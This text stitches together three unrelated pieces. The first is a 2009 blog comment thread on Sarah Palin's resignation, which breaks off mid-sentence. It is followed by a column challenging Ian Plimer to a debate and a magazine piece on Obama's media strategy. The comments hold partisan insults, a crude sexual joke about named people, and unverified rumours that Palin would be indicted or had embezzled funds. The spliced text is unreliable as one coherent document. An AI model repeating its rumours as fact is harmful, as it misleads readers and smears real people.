Right wing policies and hypocracy has exposed them as shams and charlatans .
Right Wing catering to billionaires and Wall Street has exposed them as ignorant tools of the rich , while those very rich folks are robbing them ( and all of us ) blind .
The right wing dittohead automatons are simply divide and conquer tools to keep the population at each other 's throats and distract from the blatant robbery that 's happening before our very eyes .
The racist Obama haters are just using right wing politics as a cover for their bigotry .
I 'm not happy with Obama because he has n't delivered what he campaigned on yet ... he may still deliver he 's only 6 months into a 4 year term .
But listening to this right wing ignorant mob incited by Fox news 's lies and craziness gives me hope ...
The right wing lies have been exposed ... soon true conservatives will regain control of their party from the radical right wing fringe .
And maybe this country will again have a reasonable rational debate .
Here 's hoping the Left does n't give up before that happens ... so far Obama 's ignoring of the Left makes him look bought and paid for by Wall Street .
This country is there for the people to take back , but we have to make Obama know that we wo n't be ignored .
The clock is ticking Obama ... listen to us or the Left finds another party to back ... right now the Greens look promising .
COMMENT # 161 [ Permalink ]
... another joe said on 7/4/2009 @ 9:22 am PT ...
BREAKING NEWS : Hitler used massive public works porkbarrel project to embezzle funds to build a house in Alaska !!!!!!!
Thanks for the hot tip , bozo ...
COMMENT # 162 [ Permalink ]
... BlueHawk said on 7/4/2009 @ 9:25 am PT ...
Comment # 159 Didn't Rush Limbaugh or Sean Hannity or some other loony right wing mouthpiece say the same thing ?
Now you repeat it like a parrot .
deprogram son or mam ...
COMMENT # 163 [ Permalink ]
... Beryl said on 7/4/2009 @ 9:28 am PT ...
Alaska deserved better than Palin so this is for the good of the state .
Her " cut and run " ramblings yesterday just reminded me of why she should have never been placed a 72 year old heart beat from the Presidency .
The USA deserved better and we voted better on Nov 4th 2008 .
If Palin wanted to be seriously considered in 2012 , she should have returned to Alaska , picked up ( and read ) a few books , and did the job for which she was paid by Alaska taxpayers .
Palin is cooked politically but those who love her will still have their dose of her on Faux News along with other Republican ex-convicts .
COMMENT # 164 [ Permalink ]
... BlueHawk said on 7/4/2009 @ 9:31 am PT ...
It 's telling that right wingers only deny Palin did anything illegal .
They do n't present any evidence or reason other than " everyone is out to get her " .
They ignore her history and any evidence that points to wrongdoing .
They simply say it and everyone better believe it , or we 're all Stalin , Hitler and Chavez lovers .
COMMENT # 165 [ Permalink ]
... sauerkraut said on 7/4/2009 @ 9:33 am PT ...
Shannyn Moore ( just a girl from homer blog ) is tweeting the story that Palin is about to be indicted for having her home built for free in exchange for awarding the contract to the $ 13 million Wasilla Sports Complex .
If true , that 's a huge whooops !
COMMENT # 166 [ Permalink ]
... LS said on 7/4/2009 @ 9:38 am PT ...
Hey Bluehawk
It was your boy that nationalize the GM , Chysler , Banks and insurance .
Bush gave out the first 350,000 billion and YOUR BOY gave out the rest to Wall Street .
Your boy gave out another 797 BILLION to special interest groups .
Is your your leftist scumbags that ran Fannie and Freddie and used those banks to give out welfare mortgage loans to people that can't afford them especially a significant number of illegal aliens to buy off votes .
While your boys at ACORN were stealing elections and protesting at the homes of AIG executives , your boy Barack Hussein Obama was giving out bonuses at Fannie and Freddie and had their former Executive T. Raines who made hundreds of millions of dollars on his economic committee .
Barney Frank and Chris Dodd should be in jail for their role in Fannie and Freddie .
Wake up brother ... a Marxist - Socialist dictarship is brewing right before your nose .
COMMENT # 167 [ Permalink ]
... sauerkraut said on 7/4/2009 @ 9:42 am PT ...
Wow , LS .
That 's a load of material .
Is your brain on underdrive today or is that how you usually are ?
Do you even know or understand what a " Marxist - Socialist dictarship ( sic ) " is ?
Or are you using phrases just to make yourself sound smarter than Sarah Palin ?
COMMENT # 168 [ Permalink ]
... BlueHawk said on 7/4/2009 @ 9:47 am PT ...
Comment # 166 .... your facts are twisted .
W Bush handed Wall Street $ 750 billion with no strings attached ... not Obama .
the $ 797 Bil .
Obama sent out as a stimulus package went to the States mostly ( yeah American states are special interest groups )
Fannie and Freddie played a role in this meltdown , but your ignoring of Citigroup , Goldman - Sachs , Countrywide etc etc shows your right wing programming .
Acorn - funny you present no facts other than parroting Rushbo Hannity etc etc. ACORN is their favorite boogyman .
It 's ironic that you single out Chris Dodd and Barney Frank for jail ... yet ignore Karl Rove , Dick Cheney , Alberto Gonzalez etc etc .
Your vision is really myopic ... but Fox news programming will do that to you .
COMMENT # 169 [ Permalink ]
... jake said on 7/4/2009 @ 9:48 am PT ...
Now this is exactly what I mean - another Joe-obviously either on Brad 's payroll or a long standing member of the Ignoratti who is incapable of offering a dissenting opinion without quoting the ever present anonymous sources , neighbors etc who mysteriously have no names and never quite materialize .
Or resorting to the playground behavior of calling people stupid - what else is in your Harvard acquired vocabulary - such argument defining cliches as " I know you are but what am I ? " or " it takes one to know ? "
And your use of what I 'm sure you consider clever and insider terms like first dude is really dated .
Rather than reveal the nature of your character or lack of it might be better to wipe that brown off of your nose , tell Brad you did your best and remain silent .
Difficult perhaps - but hey , give it your best shot .
What a boon the net must be for you huh ?
Again - not a Palin fan - nor a fan of your hero - who thanks to his insightful policies you and every man , woman and child in this country now owe in excess of $ 180,000.00 .
Oh yeah one more thing - that would be understated rather than understanded - guess that 's another field of expertise for you - property evaluation .
COMMENT # 170 [ Permalink ]
... BlueHawk said on 7/4/2009 @ 9:54 am PT ...
Question to Right Wingers ...
Did you know that Corporate control of government is Fascist ?
Did you know that Socialist is actually an economic tool , not a governing philosophy ?
Did you know that most Democracies in the world have socialist elements ?
Only the U.S. is radically capitalist .
If I asked a right wing loon why the sky is blue ; he or she will tell me I 'm nuts because the grass is green .
COMMENT # 171 [ Permalink ]
... another joe said on 7/4/2009 @ 9:57 am PT ...
These sources are not anonymous - public record , but there is a new thing on the tubes - its called " the google " .
If you want sources , you can " google " it yourself !
but these facts were actually known last fall , INCLUDING THE JUNE 30TH DATE !!!!!!!!!
But , hey , you somehow found your way here - try this " google " thing and see what you can find on the " tubes " !
COMMENT # 172 [ Permalink ]
... LS said on 7/4/2009 @ 9:59 am PT ...
Another Joe Hitler used trumped up charges to get rid of potential political enemies and either imprisoned them and forced them into exile .
My leftist brother ... Did you ask yourself why the fawning Obama media placed all that attention on Palin 's wardrobe but never questioned the cost of Michele 's Obama wardrobe especially the one she wore on inauguration day .
How about her $ 400 sneakers that she wore to visit a bunch of black poor inner city kids .
With the help of an slobbering Wall Street corporate controlled media a Marxist - Socialist dictatorship is brewing right under your nose .
And to make you feel good , Bush started the process .
Today is July 4th , take the TIME TO READ THE CONSTITITION and BILL OF RIGHTS .
WHETHER WE ARE LEFT OR RIGHT WE NEED TO BAND TOGETHER TO PROTECT IT , BEFORE ITS TOO LATE .
COMMENT # 173 [ Permalink ]
... steve richards said on 7/4/2009 @ 9:59 am PT ...
i think your full of B.S. and are a major reason why good people quit because thier tired of you looking into your crystal ball for more crap
COMMENT # 174 [ Permalink ]
... george said on 7/4/2009 @ 10:02 am PT ...
When Palin was giving her farewell speach , I beleive that I heard her say that Lincoln was the instigator for the US to buy Alaska .
Alaska was purchase in 1867 a few years after Lincoln .
COMMENT # 175 [ Permalink ]
... another joe said on 7/4/2009 @ 10:04 am PT ...
Hitler used Alaska taxpayer money to build his own home , understating its value at $ 500,000 to minimize the extent of the embezzlement ?!?!?!?!?
WOW !!!!!!
And said monies were embezzled via a bogus sports complex with endless cost - overruns that nearly bankruptcy that community ?
And hitler accomplished this through a rigged process that was part of convicted criminal ted stevens corrupt reign of power ?
Damn - that dude may have been evil , but he was WAY ahead of his time !
COMMENT # 176 [ Permalink ]
... 2laneIA said on 7/4/2009 @ 10:05 am PT ...
That speech was an absolute train wreck .
The loons mating in the background were the perfect aural enhancement .
She was tense , hissing through her teeth , and making as much sense as if she was trying to speak in tongues .
My immediate impression was that the decision and the speech were made and cobbled together in a hurry , and that something big must be afoot for her to throw away her presidential ambitions like this .
Pass the butter , she 's toast .
Too bad , though .
I was looking forward to having her campaign in Iowa .
There is not much entertainment value in the Mittster or Jindal .
Oh , well .
Maybe Huck will play the Surf Ballroom again .
COMMENT # 177 [ Permalink ]
... Cindy Falkoff said on 7/4/2009 @ 10:09 am PT ...
Maybe we should wait and see if there any any real reason for her resignation .
The woman has tried to convey several legitimate messages on issues and instead of listening to her substance people have insulted her life , her values , her looks , her family .
She must be a stupid low life since she did n't graduate from Harvard and does n't live in LA or NYC .
I frankly found it refreshing that a real person could move into the " good ole boy " political world and try to use a little common sense .
God knows politics has gotten out of hand , and become so hateful .
I do n't blame her for leaving , she is tired to the feeding frenzy surrounding herself and her family .
COMMENT # 178 [ Permalink ]
... LS said on 7/4/2009 @ 10:14 am PT ...
Blue Hawk
You asked some very intelligent questions and I 'm going to answer them First ... Fascism and socialism are of the same family .
NAZISM stands for Nationalist Socialist Party .
The difference is this .
Nazism is socialism but gives the appearance of capitalism .
What I mean here is there are Corporations that are separate from gov't however , through coercion the government controls the corporations .
Socialism is direct command control by the government .
What we have brewing here in front of us that first started with Bush and is now accelerating right in front our collective noses is a combinational Fascist - Socialist dictatorship .
As for your next questions , show me where socialism and maxism actually worked .
Britain and France have socialist based gov't and there are nearly Bankrupt .
As for Russia .. what happenned to them .
China has survived but they are turning to capitalism .
The bottom line is that the constitition does not allow the federal govt to be involved in SOCIAL ENGINEERING like Medicare and Social Security .
This issues should be handled by each of the REPUBLICS .
ALASKA should be dealing with healthcare , education , and welfare as expressed by each states individual constition .
I 've hoped that I have enlightened you .
Happy Independence Day
COMMENT # 179 [ Permalink ]
... Scottsdalian said on 7/4/2009 @ 10:15 am PT ...
Finally broke down and watched the video above of Palin 's speech .
For those who have not watched , here is a summary of her speech : " babblebabblebabble *GASP * babblebabblebabble*GASP * babblebabble*GASP*babblebabblebabble*GASP* babblebabblebabble*GASP* babblebabble*GASP*babblebabblebabble*GASP*babblebabblebabble*GASP* babblebabble*GASP *
Thank you and God bless Alaska . "
COMMENT # 180 [ Permalink ]
... another joe said on 7/4/2009 @ 10:21 am PT ...
Yes , brillian analysis - up is down , left is right , black is white , and quitting is " winning " and doing the " hard - work " and staying is " quitting " .
No wonder the backwash loves this one - exactly cut from the cloth that chimpy is - chronic liar that will say ANYTHING and cover it up with an endless stream of crap !
Gotta love quittin ' on the voters you begged to send you to the govenor 's office less than 2 years ago , less than 1/2 way into your term .
That is " winning " and making a " strong political statement ! "
What a role model for girls and young woman all around America !
Great message too - QUIT and pretend doing so is somehow " taking the high rode " I sure hope our trolls ( that I am sure are posting under multiple identities mostly using handles that imply female , but are probably otherwise ) come back as the rest of us break out the popcorn and find out what really precipitated this .
Fine principled stand indeed - QUIT RIGHT BEFORE THE FOURTH OF JULY NEWS DUMP !!!!!!!!!!!!!!!!!!
COMMENT # 181 [ Permalink ]
... BlueHawk said on 7/4/2009 @ 10:21 am PT ...
Comment # 177 Cindy ... So to you it 's perfectly normal for an elected governor to walk away from her elected duties halfway through her term and give no viable reason ?
If she were sick she would have said so , it would have played well with her victim complex .
Sarah Palin did n't bust the good ol ' boys network , she became one of them .
I am eternally grateful that a woman who could n't site a news source she read or describe any policies that were at work in this country did n't become within a heartbeat of the Presidency .
Sarah Palin was all the evidence needed last November that the GOP had lost it 's mind by putting her on the ticket .
The GOP got what they deserved in Sarah Palin ... laughed at .
I can see the moon from my front porch ...
COMMENT # 182 [ Permalink ]
... The One said on 7/4/2009 @ 10:22 am PT ...
For all of you on here using terms " socialist , marxist and etc. " you really do n't know the meaning of but heard on your favorite but biased cable station and took it for granted THEY knew what they were talking about spend some of the time you use posting messages on here and increase your vocabulary by hitting a book .
Start with a dictionary and work your way up .
COMMENT # 183 [ Permalink ]
... Joe the Plummers Ex wife said on 7/4/2009 @ 10:24 am PT ...
I think my ex husband has given Todd an STD .
COMMENT # 184 [ Permalink ]
... another joe said on 7/4/2009 @ 10:26 am PT ...
Wonder if our newly found trolls ( under different identities and implying they are mostly female - NOT ! ) would hail palin for quittin ' the VP role had she won .
And if she had somehow succeeded mclame because he could not finish his term , wonder if they would proclaim that here quitting the presidency was a " shrewd " move too ?!?!?!?!?
Funny how none of the trolls will respond to the FACT that , had mclame won , SHE WAS A HEARTBEAT AWAY FROM THE PRESIDENCY .
Quittin ' would look real presidential and principled then , would n't it , trolls ?
COMMENT # 185 [ Permalink ]
... another joe said on 7/4/2009 @ 10:29 am PT ...
TheOne , do n't know , even a kiddies dictionary is a pretty disciplined read , perhaps a picture dictionary is a better start .
But for my money , you can't beat the PIGEON series by Mo Willems !
COMMENT # 186 [ Permalink ]
... Bluebear2 said on 7/4/2009 @ 10:34 am PT ...
They always pop these things on Fridays .
Lost in the news cycle .
Better yet if it is a holiday !
COMMENT # 187 [ Permalink ]
... BlueHawk said on 7/4/2009 @ 10:35 am PT ...
Comment # 178 ... LS you 're way off ....
First off Nazi Germany was Fascist ; the first government with a Military Industrial complex , just like the U.S. has now .
Just because the fascists that ran Germany used the word " socialist " does n't mean Germany practiced Socialism .
Socialism works all over the world ... it 's just that your mouthpieces Rushbo and Hannity ignore that fact .
You saying Britain and France are broke is hilarious , last I heard so was the U.S .
For an example of where Socialism worked , look no farther than right here in the Good ol ' US of A ...
The new deal was socialism at it 's best .
it created the middle class and gave workers some dignity and a piece of the American dream .
Ronald Reagan started the undoing of our middle class and unionized labor ... Bush Sr. and Clinton continued and W Bush put Reagan 's destruction of the new deal on steroids and finished the job .
No offense intended but you need to do some more reading ... your facts are way off .
COMMENT # 188 [ Permalink ]
... Bluebear2 said on 7/4/2009 @ 10:36 am PT ...
Now this is entertainment !
What fun !
COMMENT # 189 [ Permalink ]
... another joe said on 7/4/2009 @ 10:37 am PT ...
bluebear2 - not this time , people are going to laugh and talk about this all holiday weekend !
Just look at the threads about it on all the blogs - do n't think I have ever seen this much dialog on one topic here .
And look at how it is bringing the wacko trolls out !!!!!!
We never see this many here either ( and so many different " new " female posters !?!?!?!?!?!?)
The conventional wisdom about the friday news dump CERTAINLY DID NOT APPLY IN THIS CASE !
COMMENT # 190 [ Permalink ]
... Road Hussein Runner said on 7/4/2009 @ 10:38 am PT ...
Is this " Cut and run " as used by Pig Lips during the campaign ?
In an interview with Fake News immediately after the press conference , her brother said he found the same way everyone else did - the news conference .
The announcer at Fake News said they knew about it 2 hours before the announcement .
I guess they are more important than the " family " .
Did n't she also say that the family voted " hell yea ! "
How ?
Pig Lips
First husband " flew in last night to be at my side , as usual " .
Why was n't he there when the decision was being voted on ?
Another one bites the dust .
COMMENT # 191 [ Permalink ]
... JT said on 7/4/2009 @ 10:45 am PT ...
Please trust me , liberals are n't panicking about this news .
We are partly reveling in her resignation and partly sad because it makes her a nonfactor in 2012 .
COMMENT # 192 [ Permalink ]
... another joe said on 7/4/2009 @ 10:46 am PT ...
Why was n't he there when the decision was being voted on ?
She 's been boofin ' his business partner again , but now it looks like he will lose their $ 500,000 ( actually much more ) home !
COMMENT # 193 [ Permalink ]
... Road Hussein Runner said on 7/4/2009 @ 10:52 am PT ...
# 178 , if not for the Socialism , where would we be today ?
We have :
1. 5 - day work week
2. 7 1/2 to 8 hour work day
3. Minimum wage
4. Medicare for your for parents and grandparents
5. Social Security ( if small Bush ( the shrub ) had his way , Wall Street would have lost all that in their greed )
6. Somewhat clean air to breathe
7 . The right to vote
8 . A banking system that worked for 50 years until the Gramm and McCain dismantled it
9 . Food that is somewhat safe to eat
10 . Imports that were tariffed to save American jobs , until Reagan / Bush dismantled it
11 . OSHA for a safe workplace ( the miners are still hoping to be included ) TO LIST A FEW !
There are lots more I can add .
COMMENT # 194 [ Permalink ]
... Repubs in tailspin said on 7/4/2009 @ 10:55 am PT ...
I love how the republicans are convincing themselves that liberals are actually " scared " of palin .
Funny how thats what rush said yesterday and now that is the main talking point .
Idiots .
Also , just as an aside , if you 're gonna talk the talk , you gotta walk the walk , GOP .
COMMENT # 195 [ Permalink ]
... karen said on 7/4/2009 @ 11:01 am PT ...
A general comment on partisan battles the are in these comments : I find lots of criticisms by liberal / progressives of what Obam is doing with Wall Street etc.. and they have issues with Dodd and Frank , and also issues with what Paulson , Bush .
However , most of the conservatives comments on her seem to indicate you only think only evil or corruption comes from Dems , never conservatives .
While most liberal Dems I know think Dems pols do a lot bad also , but tend to support Dems in general as less worse as Repubs .
I think you can make a credible case that as bad as I see Geitner and Obama on bank bailout , they are less worse than Paulson , because they have been slightly more transparent and slightly better spending some of the debt on general economy not just banksters .
Not that is much consolation to me , as our Admin and Congress seem owned by Wall Street .
However , my point is , I can see flaws in Dem pols and can admit that they exposing of these flaws is not just Repub conspiracy or just holier - than - thou religious zealots looking down on Dems , they really are corrupt sometimes .
I think many stories on Brad Blog show how this blog and many of its followers are willing to be quite critical of Dems when it is of real substance , like Brad 's issue with Holt voting bill currently profiled here and Hillary 's strangely analamous comeback win in NH primary etc ... but BradBlog is also unwilling to yield to inaccurate spin like Acorn stupidity or saying Franken stole it when MN process was a million times more thorough and transparent and bi-partisan than Florida 2000 .
I think where evidence supports the Dem criticism , Brad Blog and the like are more than willing to report it and expose it .
How can we make progress if we just always think the other party is the bad guy and can't see the corruption and lack of populist representation where ever it is .
Please , conservatives , please consider some of your guys can be corrupt too , just as Brad has been willing to do in regards to Dems .
And where our interests overlap , such as the corruption of government by Wall Street , lets get it together and stop this corruption instead of always blaming the other party .
COMMENT # 196 [ Permalink ]
... jake said on 7/4/2009 @ 11:04 am PT ...
OH .... I see now - it 's on the net .
Well what more verification does one need ?
I was n't aware of the unimpeachable nature of the net .
Gee you mean all the alien abduction stories are true ?
Have you been assigned your Fema number and relocation site yet - or fitted for one of those Fema " coffins " ?
Elvis and MJ are really alive and well ?- what a relief !
Google it - today 's mantra - and the pathetic fallacy that Wikipedia has become with their constant battle to root out the misinformation there .
Since you seem to be familiar with the oft trod path to these unimpeachable sites try the latest thing - it 's called cross referencing .
Instead of clinging to whatever would seem to support your favored position be willing to search for opposing views and objectively weigh the merits and base your opinions on those results .
The " tubes " - let me guess you have never heard the term " photoshopped ' and for the multitude of " evidence ' that has been shown to be ps'd you are in denial and claim instead that such creators of these laughable bits of evidence are unsung patriotic heroes ?
Well 'nuf said then .
Do n't you realize that all it takes in today 's society is for some idiot to make a statement , present " proof " and it then becomes gospel ?
Do you buy into all this ?
I 'm willing to bet you are one of the so called " truthers " who thinks 9/11 was a government conspiracy , the NWO and Illuminatti are behind the swine flu and nobody ever actually landed on the moon because it is indeed cheese and incapable of supporting the additional weight .
Personally I do n't care what Palin or your
personal favorite does - have n't you realized by now that no politician serves the best interests of the country - their primary concern is re election , the political debts they have incurred and corporate America ?
All the while counting on people to obscure reality with bumper stickers , ridiculous mantras and waving banners with either an elephant or an ass on it .
COMMENT # 197 [ Permalink ]
... BaltoJim said on 7/4/2009 @ 11:07 am PT ...
Ain't it strange how conservatives seem to be the experts in everything Fascist , Socialist , Nazi / Hitler , Communist , etc . ?
Just sayin ' ...
COMMENT # 198 [ Permalink ]
... Chuckler said on 7/4/2009 @ 11:16 am PT ...
" COMMENT # 116 [ Permalink ]
... ChMoore said on 7/4/2009 @ 2:14 am PT ... I have a simple question about simple logic .
Why would " federal investigators " give a rats ass about sports complex building materials being used for the governor 's home ?
I 'm going on the assumption that neither the Wasilla Sports complex or the governor 's home are federal buildings , or federally funded , therefore federal investigators would not have jurisdiction . "
Answers : 1 . Mail and wire fraud - Title 18 , UnitedStates Code , Sections 1341,1343 , and 1346 2 . Title 18 , United States Code , Sections 666( a ) ( 1 ) ( B ) and 2 - Theft or bribery concerning programs receiving Federal funds .
" Concerning " is the operative word here .
If the Wasilla Sports Complex or the city are receiving federal money for practically any kind of program taking place there , it probably will be sufficient to establish a violation .
COMMENT # 199 [ Permalink ]
... another joe said on 7/4/2009 @ 11:18 am PT ...
BaltoJim - spot on , but then again , if you have supported chimpy and his criminal family throughout the years - you are actually throwing your support behind the criminal cabal that brought hitler to power and then made fortunes underwriting WW II They are the FIRST FAMILY OF TREASON !
COMMENT # 200 [ Permalink ]
... isis said on 7/4/2009 @ 11:19 am PT ...
This is such vindication of female liberals everywhere who patently rejected Failin ' Palin as " one of them " .
Once this woman paraded her children on stage using them as political tools , we began to smell a rat ( or an abusive mother ) .
Of course , when her obviously embarrassingly pregnant daughter was outed by Palin to the media and they responded , she slapped them down saying " family was off limits " .
When did we EVER see Obama 's daughters out there as political pawns on stage ?
Fact : Never !
This is a quality parent who is not ambiguous - saying one thing and doing another .
This is the action of a very caring parent .
Then she was sequestered from the press in an obvious attempt for her to " study up " so she could be made presentable .
Well , as it now goes the adage thoughout ( which she even said about herself ) was that you " ca n't put lipstick on a pig " and if it smells like a pig , walks like a pig ... well you get the ' gist .
This vacuous woman in no way , shape or form could be made presentable or credible to the intelligent , accomplished women in this country who patently rejected her .
Her lack of curiosity , intelligence and world view made it obvious that she was out of her league and , in no way , exemplified the qualities and characteristics of a national leader .
We now have the proof which we 've known for a long time - Sarah Palin botched her job as mother with her children ; she could n't cut the mustard even being Mayor of Wasilla where there was a massive recall ongoing for her ouster , she never showed up for work as Governor of Alaska ( the legislature had " where 's sarah " pins - yes , actually they did ! ) .
Her approval ratings tanked like the titanic following her " onstage hate mongering " which was tantamount to inciting violence in our public square and she should have been arrested under the Patriot Act back then .
Failin'Palin botches it again - this time she quit again just as she did with the 5 or 6 colleges she attended when she did n't get the grades she wanted ...... it's a pathological pattern of incompetence combined with psychiatric paranoia and the need to play the ' victim ' .
If all you 've evern known is chaos , then when things become a bit too calm , you pathologically create your own situation to increase the chaos .
Palin has been embroiled in petty disagreements with everyone who has ever crossed her path in life from her own brother in law , to her college profs , to the people of wasilla and now to her own legislature who have now rejected her .
Sorry Sarah but we all knew that you were never cut out for the job .
It 's difficult for intelligent women everywhere to refrain from saying the obvious :
We told you so !
COMMENT # 201 [ Permalink ]
... jake said on 7/4/2009 @ 11:22 am PT ...
You want a truth ?
Check out what Helen Thomas had to say about the glaring lack of openness and access to the carefully crafted and manipulated " town hall " meetings .
" Change " was that the devotional you all sang ?
Well America certainly has it - only problem is the stench surrounding it .
" Worse than Nixon " she says - that must cause a serious carbuncle on the collective a** of the faithful .
My bad - they will deny and mindlessly continue on their myopic way .
Would it have been better with an elephant in the house rather than an ass - not for one minute , and that is the point .
[ ed note : Link -- 99 ]
COMMENT # 202 [ Permalink ]
... Craig said on 7/4/2009 @ 11:54 am PT ...
Uhh ... Jake ... please ... take your meds ...
COMMENT # 203 [ Permalink ]
... BlueHawk said on 7/4/2009 @ 12:00 pm PT ...
Comment # 201 ...
Helen Thomas was critical of Obama 's town hall meeting .
Well that 's a good thing .
What 's even more great about that is that Obama 's staff didn '
Is Professor Ian Plimer a chicken ?
After I attacked some of the crazy claims he made in his book Heaven and Earth , the good professor challenged me to a face - to - face debate .
At first I was n't interested : judging from his responses to his critics , he appears to be impervious to reason .
I can picture him standing up to his neck in water , still telling us not to worry about global warming — it 's all been dreamed up by a global conspiracy .
More importantly , it seems to me that he 's a grandstander , who wants nothing more than to make as much noise as possible in the hope that it will drown out the precise refutations published by his book 's reviewers .
As far as I can discover , he has yet to produce any specific response to the very serious allegations they have made , preferring to heap insults on them instead .
To resolve these issues , we need to establish the facts and provide references .
This is why I want him to answer them in writing ; ideally in electronic format , so that people can follow the links .
I was concerned that a face - to - face debate , with all its bluster and generalisations , would let him off the hook .
But then it struck me that there was no reason why we could n't do both .
Last week I wrote to Professor Plimer accepting his challenge , on the condition that he accepts mine .
I would take part in a face - to - face debate with him as long as he agreed to write precise and specific responses to his critics ' points — in the form of numbered questions that I would send him — for publication on the Guardian 's website .
I also proposed that there should be an opportunity at the debate for us to cross -examine each other .
This morning I received a message from Professor Plimer , rejecting my challenge .
So much for his enthusiasm for debate .
In case he has somehow missed the point of my conditions , I have spelt them out again .
In a face - to - face debate , any specific claims he makes will be impossible for the audience to check during the event .
In a written exchange , readers can see for themselves whether or not his specific claims stack up .
The two debates are complementary : having had the opportunity to check his specifics , people at the face - to - face debate can better assess his generalisations .
There is no good reason that I can think of why he would wish to avoid this process : in fact it gives him an excellent opportunity to answer the very damaging allegations made by his critics .
There is an obvious bad reason : he has no answers to their points .
Cross-examination allows us to put each other 's claims to the test and ensures the other person can't avoid the question .
Will Professor Plimer accept my challenge , or are we to conclude that he can't face the music ?
Does all this posturing as the brave maverick exposing a global conspiracy really conceal a broad yellow streak ?
Monbiot.com
Photo : From left to right : Haraz N. Ghanbari / AP ; Pablo Martinez Monsivais / AP ; Kristoffer Tripplaar / Sipa Press ; Lawrence Jackson / Landov ; Joshua Roberts / UPI / Landov ; Courtesy of the White House ; Lauren Victoria Burke / Courtesy of ABC News
Since occupying the White House , Barack Obama has hosted fifteen town - hall meetings ; appeared in more than 800 images on the White House Flickr photo - stream ; and held four prime - time press conferences , the same number held by George W. Bush in his entire presidency .
He ’s sent a video message to the people of Iran .
He ’s given an address in Cairo that was translated into fourteen languages .
He ’s sat on Jay Leno ’s couch , where he riffed about the supreme strangeness of having his own motorcade ( “ You know , we ’ve got the ambulance and then the caboose and then the dogsled ” ) , and he ’s walked Brian Williams through the White House , where he introduced the anchor to Bo the dog .
Two weeks ago , when he made a controversial comment at a press conference ( that the Cambridge police had “ acted stupidly ” toward Harvard professor Henry Louis Gates Jr. ) , he followed up with yet another press appearance in the White House briefing room — and an exclusive interview on Nightline .
And that was before he sat down for a well - publicized beer with Gates and the offending officer …
Such are the president ’s media habits .
It ’s gotten to the point where one expects to see and hear from him every day .
He ’s in the information business almost as much as the policy business .
“ This is president as content provider , ” says Ed Gillespie , the former Republican National Committee chairman and adviser to George W. Bush .
“ It ’s like when Rosie O’Donnell had a show and a magazine and a blog . ”
The president has taken a fair amount of heat for this full - saturation approach .
Friends and critics alike have complained it cheapens his words , erodes his mystique , and , worst of all , smacks of desperation .
“ You do n’t have to be on television every minute of every day , ” cracked Bill Maher recently .
“ You ’re the president , not a rerun of Law & Order . ”
Yet it ’s also clear that the public has a near - insatiable appetite for Obama - related content , from the trivial to the serious .
Dreams From My Father is now in its 156th week on the New York Times ’ best - seller list .
Bill Burton , a White House deputy press secretary , tells me that he fields almost as many phone calls from the celebrity press as from the Washington Post , as if the president were George Clooney .
“ And they call about things that might surprise you , ” he adds .
“ Like when Tom Daschle withdrew his nomination . ”
( You know your president ’s a headliner when E ! is interested in cabinet resignations . )
With unemployment at 9.5 percent and the most ambitious public - policy initiative to sell since the creation of Medicare , it ’s a decided plus for Obama to be lumped into the same category as a box - office star .
Indeed , the president ’s personal popularity , still hovering at 58 percent , may be one of the few weapons he has left .
As Republicans are fond of noting ( usually with some frustration ) , so long as the public still likes him personally , it ’ll remain open to his agenda — at least in theory .
“ If you poll a question about a policy in an anodyne , sterile way , you ’ll often find that Barack Obama ’s positions are inversely proportional to his popularity , ” notes Gillespie .
“ But if you say it ’s President Obama ’s policy , it pulls the numbers right back up . ”
The White House is exquisitely aware of this advantage .
Three years ago , Rahm Emanuel , then a congressman and now Obama ’s chief of staff , shrewdly remarked to me that the then - senator was as much “ a cultural phenomenon as a political phenomenon . ”
Last month , when I ran into Emanuel in the West Wing reception area , I asked him how being a cultural phenomenon compared to being a guy voters want to have a beer with .
He thought for a moment .
“ There ’s a brand to it , ” he said , before vanishing into a meeting .
As public support for health - care reform erodes — polls show it ’s now below the 50 percent mark — it ’s no accident that the White House is making the most of brand Obama .
Health - care reform is the main tent - pole in the president ’s domestic agenda , the piece of legislation in which Obama has the highest stake .
And so he sits for an interview on the Today show with Meredith Vieira .
He holds a conference call with progressive bloggers .
He courts regional media , convenes town - hall meetings , and holds assorted press conferences , including one in prime time .
It ’s a large helping of Obama , surely .
But those who think the White House has overdone it are missing the point .
In today ’s media environment , ubiquity is not the same as overexposure .
It ’s a deliberate strategy .
And it ’s critical to any understanding of the Obama presidency .
It ’s almost cliché by now to say that Barack Obama is a new - media president .
But it ’s not his nimble use of Facebook and Twitter that makes him so .
It ’s the fact that he ’s the first president who has grasped the possibilities of today ’s high - velocity , high - density , highly variegated media landscape .
With the exception of George W. Bush , all of Obama ’s predecessors had a limited number of news outlets in which to make their cases , limited space in which to do it , and a time - bound moment to make their mark — if voters did n’t catch their press conferences or read the morning paper , they were pretty much out of luck .
Now , as all of us are aware , the web provides infinite space for both its own native forms ( blogs , news aggregators , original YouTube posts ) and old media ( newspapers , TV clips ) , making it possible for us to watch a speech or read a story whenever we want , unconstrained by space and time .
The resulting landscape is vast , diffuse , and multiplatform .
And Obama is a multiplatform natural :
He ’s done books and audiobooks ; he commands audiences on both YouTube and from the podium ; he BlackBerrys ; he makes a nice photo .
He recognizes that , in the same way a blog ca n’t survive on just one post a day , a presidency can no longer survive on one message per day or one press conference per year .
Instead , you have to turn on a fire hose .
Photo : Jewel Samada / AFP / Getty Images ( Obama ) .
Location courtesy of Best Buy , Long Island City , Queens , N.Y .
One of the most common complaints from Republicans these days , for instance , is that Obama generates too many messages per day , producing too many targets , so that they ’re never able to lock in on one for long enough to bring it down .
Even when his administration is preoccupied with passing a single bill , like the stimulus package or health - care reform , he ’s still pushing several other policies at once .
“ It ’s remarkably challenging to focus on a single issue or criticism of what the administration is doing , ” says Representative Tom Price , head of the House Republican Study Committee , “ because the president rapidly shifts to another major speech or agenda event before the consequences of the first are able to sink in with the American people . ”
Mark McKinnon , a former adviser to both Bush and John McCain , points out that the day after Obama signed his stimulus bill , he announced a mortgage - relief plan for homeowners , allowing almost no time for discussion of a bill that passed with just three Republican votes .
In a much more admiring fashion , Stan Greenberg , the Democratic pollster , notes that Obama released a radio address on health care the same time he visited Normandy , just to keep the domestic ball rolling while he was on his foreign tour .
“ We did n’t even understand what he was doing at first , ” says one White House reporter .
“ We ’d all say , ‘ Why is he stepping on his message ? ’ ”
In Reagan ’s day , it would have been heresy to move so rapidly from one message to another .
But in an infinite media marketplace , with micro news cycles and niche news outlets , no one story gains traction for very long , and there ’s always room somewhere for one of your ideas .
“ Even when I was on the Kerry campaign in 2004 , ” says Burton , Obama ’s deputy press secretary , “ something that showed up on the front page of the New York Times would drive a lot of the news that day and a least a couple of broadcasts that night .
